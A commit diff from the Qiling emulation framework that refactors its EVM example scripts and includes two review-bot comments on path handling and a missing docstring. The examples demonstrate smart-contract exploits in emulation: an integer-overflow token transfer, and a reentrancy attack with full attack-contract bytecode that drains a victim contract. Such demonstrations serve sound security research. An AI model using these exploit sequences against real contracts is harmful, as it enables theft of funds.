
Commit dc31e89

authored
Merge pull request #893 from kabeor/dev
Dev
2 parents 7372194 + 1de2121 commit dc31e89

18 files changed

+134
-140
lines changed

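--- a/examples/evm/evm_Hexagon_overflow.py
+++ b/examples/evm/evm_Hexagon_overflow.py
@@ -3,37 +3,35 @@
 
 import sys
 
-sys.path.append("../../../..")
+sys.path.append("../..")
 from qiling import *
-from qiling.engine.evm.vm.utils import analysis_bytecode, bytecode_to_bytes
-from qiling.engine.evm.vm.disassembler import EVMDisasm
 
 
 def example_run_evm():
 ql = Qiling(archtype="evm")
 contract = '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'
 
-user1 = ql.arch.evm.create_account(balance=100*10**18)
-user2 = ql.arch.evm.create_account(balance=100*10**18)
-c1 = ql.arch.evm.create_account()
+user1 = ql.arch.create_account(balance=100*10**18)
+user2 = ql.arch.create_account(balance=100*10**18)
+c1 = ql.arch.create_account()
 
 def check_balance(sender, destination):
-call_data = '0x70a08231'+ql.arch.evm.abi.convert(['address'], [sender])
-msg2 = ql.arch.evm.create_message(sender, destination, data=call_data)
+call_data = '0x70a08231'+ql.arch.abi.convert(['address'], [sender])
+msg2 = ql.arch.create_message(sender, destination, data=call_data)
 return ql.run(code=msg2)
 
 # Deploy runtime code
-msg0 = ql.arch.evm.create_message(user1, b'', code=contract, contract_address=c1)
+msg0 = ql.arch.create_message(user1, b'', code=contract, contract_address=c1)
 ql.run(code=msg0)
 
 # # SMART CONTRACT DEPENDENT: check balance of user1
 result = check_balance(user1, c1)
 print('User1 balance =', int(result.output.hex()[2:], 16))
 
 # # SMART CONTRACT DEPENDENT: transform from user1 to user2
-call_data = '0xa9059cbb'+ ql.arch.evm.abi.convert(['address'], [user2]) + \
-ql.arch.evm.abi.convert(['uint256'], [0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe])
-msg1 = ql.arch.evm.create_message(user1, c1, data=call_data)
+call_data = '0xa9059cbb'+ ql.arch.abi.convert(['address'], [user2]) + \
+ql.arch.abi.convert(['uint256'], [0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe])
+msg1 = ql.arch.create_message(user1, c1, data=call_data)
 result = ql.run(code=msg1)
 if int(result.output.hex()[2:], 16) == 1:
 print('User1 transfered Token to User1')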
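Review bot: The new `sys.path.append("../..")` on line 6 is resolved against the process's working directory, not against the script's own location, so the example only finds the checkout's `qiling` when it is launched from `examples/evm`. Started from anywhere else, the entry points at an unrelated directory two levels above the caller's cwd, and `from qiling import *` then loads whatever package of that name Python finds there or elsewhere on the path. Anchoring the entry to the file removes that dependency: add `import os` and use `sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", ".."))`. The same line is introduced in evm_debugger.py (line 2), evm_reentrancy.py (line 3) and evm_reentrancy_vol.py (line 3).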

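--- a/examples/evm/evm_debugger.py
+++ b/examples/evm/evm_debugger.py
@@ -1,5 +1,5 @@
 import sys
-sys.path.append("../../../..")
+sys.path.append("../..")
 from qiling import *
 
 
@@ -9,12 +9,12 @@
 contract = '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'
 
 # Add Balance Var to the contract
-bal = ql.arch.evm.abi.convert(['uint256'], [20])
+bal = ql.arch.abi.convert(['uint256'], [20])
 contract = contract + bal
 
-user1 = ql.arch.evm.create_account(balance=100*10**18)
-user2 = ql.arch.evm.create_account(balance=100*10**18)
-c1 = ql.arch.evm.create_account()
+user1 = ql.arch.create_account(balance=100*10**18)
+user2 = ql.arch.create_account(balance=100*10**18)
+c1 = ql.arch.create_account()
 
-msg0 = ql.arch.evm.create_message(user1, b'', code=contract, contract_address=c1)
+msg0 = ql.arch.create_message(user1, b'', code=contract, contract_address=c1)
 ql.run(code=msg0)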

examples/evm/evm_reentrancy.py

Lines changed: 11 additions & 11 deletions
@@ -1,25 +1,25 @@
11
import sys
22

3-
sys.path.append("../../../..")
3+
sys.path.append("../..")
44
from qiling import *
5-
from qiling.engine.evm.vm.utils import bytecode_to_bytes, runtime_code_detector
6-
from qiling.engine.evm.vm.vm import BaseVM
7-
from qiling.engine.evm.constants import CREATE_CONTRACT_ADDRESS
5+
from qiling.arch.evm.vm.utils import bytecode_to_bytes, runtime_code_detector
6+
from qiling.arch.evm.vm.vm import BaseVM
7+
from qiling.arch.evm.constants import CREATE_CONTRACT_ADDRESS
88

99

1010
if __name__ == '__main__':
1111
ql = Qiling(archtype="evm")
12-
vm:BaseVM = ql.arch.evm.emu.vm
12+
vm:BaseVM = ql.arch.emu.vm
1313

1414
C1 = b'\xaa' * 20
1515
C2 = b'\xbb' * 20
1616
User1 = b'\xcc' * 20
1717
User2 = b'\xde\xad\xbe\xef' * 5
1818

19-
ql.arch.evm.create_account(C1)
20-
ql.arch.evm.create_account(C2)
21-
ql.arch.evm.create_account(User1, 100*10**18)
22-
ql.arch.evm.create_account(User2, 100*10**18)
19+
ql.arch.create_account(C1)
20+
ql.arch.create_account(C2)
21+
ql.arch.create_account(User1, 100*10**18)
22+
ql.arch.create_account(User2, 100*10**18)
2323

2424
EtherStore_contract = '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'
2525
# Attack_contract = '0x608060405234801561001057600080fd5b5060405160208061046d83398101806040528101908080519060200190929190505050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550506103ea806100836000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680636289d38514610152578063acd2e6e51461015c578063ff11e1db146101b3575b670de0b6b3a76400006000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16311115610150576000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663155dd5ee670de0b6b3a76400006040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180828152602001915050600060405180830381600087803b15801561013757600080fd5b505af115801561014b573d6000803e3d6000fd5b505050505b005b61015a6101ca565b005b34801561016857600080fd5b50610171610339565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b3480156101bf57600080fd5b506101c861035e565b005b670de0b6b3a764000034101515156101e157600080fd5b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663e2c41dbc670de0b6b3a76400006040518263ffffffff167c01000000000000000000000000000000000000000000000000000000000281526004016000604051808303818588803b15801561026e57600080fd5b505af1158015610282573d6000803e3d6000fd5b50505050506000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663155dd5ee670de0b6b3a76400006040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180828152602001915050600060405180830381600087803b15801561031f57600080fd5b505af1158015610333573d6000803e3d6000fd5b50505050565b6000809054906101000a900473fffffffffffffffffffffffffffffffffffff
fff1681565b3373ffffffffffffffffffffffffffffffffffffffff166108fc3073ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f193505050501580156103bb573d6000803e3d6000fd5b505600a165627a7a723058204ad3139b1085c12112b76e9eab70c6589942d6e84eb3d8329a644eca757c19d00029'
@@ -47,7 +47,7 @@
4747
# print(res.output)
4848
print('Victim balance: ', vm.state.get_balance(User1)/10**18)
4949

50-
code2 = bytecode_to_bytes(Attack_contract+ql.arch.evm.abi.convert(['address'], [C1]))
50+
code2 = bytecode_to_bytes(Attack_contract+ql.arch.abi.convert(['address'], [C1]))
5151
# print(code2.hex())
5252
print('\n------ Deploy Attack Contract')
5353

@@ -63,7 +63,7 @@
6363

6464
print('\n------ Attacker deposit 1 ETH to DeFi contract, Start Reentrancy Attack')
6565
# 4. User2 pwnEtherStore with 1ETH
66-
call_data = '0xa75e4625' + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes('0xe2c41dbc')]) + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes('0x155dd5ee')])
66+
call_data = '0xa75e4625' + ql.arch.abi.convert(['bytes4'], [bytecode_to_bytes('0xe2c41dbc')]) + ql.arch.abi.convert(['bytes4'], [bytecode_to_bytes('0x155dd5ee')])
6767
# ql.debugger = True
6868
msg4 = vm.build_message(None, 1, 3000000, C2, User2, 1*10**18, bytecode_to_bytes(call_data), rt_code1)
6969
res = vm.execute_message(msg4)

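--- a/examples/evm/evm_reentrancy_vol.py
+++ b/examples/evm/evm_reentrancy_vol.py
@@ -1,25 +1,25 @@
 import sys
 
-sys.path.append("../../../..")
+sys.path.append("../..")
 from qiling import *
-from qiling.engine.evm.vm.utils import bytecode_to_bytes, runtime_code_detector
-from qiling.engine.evm.vm.vm import BaseVM
-from qiling.engine.evm.constants import CREATE_CONTRACT_ADDRESS
+from qiling.arch.evm.vm.utils import bytecode_to_bytes, runtime_code_detector
+from qiling.arch.evm.vm.vm import BaseVM
+from qiling.arch.evm.constants import CREATE_CONTRACT_ADDRESS
 
 
 def template(vic_contract, deposit, withdraw):
 ql = Qiling(archtype="evm")
-vm:BaseVM = ql.arch.evm.emu.vm
+vm:BaseVM = ql.arch.emu.vm
 
 C1 = b'\xaa' * 20
 C2 = b'\xbb' * 20
 User1 = b'\xcc' * 20
 User2 = b'\xde\xad\xbe\xef' * 5
 
-ql.arch.evm.create_account(C1)
-ql.arch.evm.create_account(C2)
-ql.arch.evm.create_account(User1, 100*10**18)
-ql.arch.evm.create_account(User2, 100*10**18)
+ql.arch.create_account(C1)
+ql.arch.create_account(C2)
+ql.arch.create_account(User1, 100*10**18)
+ql.arch.create_account(User2, 100*10**18)
 
 EtherStore_contract = vic_contract
 
@@ -47,7 +47,7 @@ def template(vic_contract, deposit, withdraw):
 # print(res.output)
 print('Victim balance: ', vm.state.get_balance(User1)/10**18)
 
-code2 = bytecode_to_bytes(Attack_contract+ql.arch.evm.abi.convert(['address'], [C1]))
+code2 = bytecode_to_bytes(Attack_contract+ql.arch.abi.convert(['address'], [C1]))
 # print(code2.hex())
 print('\n------ Deploy Attack Contract')
 
@@ -63,7 +63,7 @@ def template(vic_contract, deposit, withdraw):
 
 print('\n------ Attacker deposit 1 ETH to DeFi contract, Start Reentrancy Attack')
 # 4. User2 pwnEtherStore with 1ETH
-call_data = '0xa75e4625' + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes(deposit)]) + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes(withdraw)])
+call_data = '0xa75e4625' + ql.arch.abi.convert(['bytes4'], [bytecode_to_bytes(deposit)]) + ql.arch.abi.convert(['bytes4'], [bytecode_to_bytes(withdraw)])
 
 msg4 = vm.build_message(None, 1, 3000000, C2, User2, 1*10**18, bytecode_to_bytes(call_data), rt_code1)
 res = vm.execute_message(msg4)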
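Review bot: `template` (line 10) has no docstring, and nothing at the signature tells a caller what `vic_contract`, `deposit` and `withdraw` must look like. Line 24 uses `vic_contract` as the victim contract's code, and line 66 passes `deposit` and `withdraw` through `bytecode_to_bytes` before encoding each as `bytes4`, so they are presumably hex-string function selectors like the `'0xe2c41dbc'` and `'0x155dd5ee'` literals in evm_reentrancy.py. I would add `"""Run the reentrancy scenario against vic_contract; deposit and withdraw are the victim's 4-byte function selectors as hex strings."""` under the `def` line. The function body continues outside the three hunks shown, so the return value is not visible here and is left out of the proposed text.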
